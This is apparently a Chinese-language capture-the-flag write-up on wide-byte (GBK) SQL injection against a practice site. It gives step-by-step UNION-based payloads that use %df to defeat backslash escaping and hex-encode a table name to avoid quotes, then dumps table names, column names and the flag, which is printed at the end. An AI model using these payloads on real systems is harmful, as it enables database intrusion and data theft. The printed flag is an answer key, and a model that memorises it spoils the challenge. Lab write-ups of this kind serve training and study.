宽字节注入

URL：http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

(1)判断是否有注入

  加'执行发现转义符\，所以要绕过

(2)绕过转义符\     

       %df    %af     %aa(各浏览器执行结果不一致)

 (3)使其成功闭合

构造 ?id=1%df' -- +

 

 (4)判断字段数

构造 ?id=1%df' order by 2-- +

 由此可得，表news的列数为2

 

(5)判断回显点

构造 ?id=-1%df' union select 1,2-- +

  由此可得，回显点的位置为2

 

(6)爆库

构造 ?id=-1%df' union select 1,database() -- +

 (7)爆表

构造 ?id=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- +

 

 (8)爆列

构造 ?id=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name='gbksqli' -- +

 

 因为单引号被过滤了，此时需要绕过(十六进制绕过)

将表gbksqli进行十六进制编码，编码后为0x67626B73716C69

构造 ?id=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x67626B73716C69 -- +

 

(9)爆值

构造 ?id=-1%df' union select 1,group_concat(flag) from gbksqli -- +

 

 

 flag:nctf{gbk_3sqli}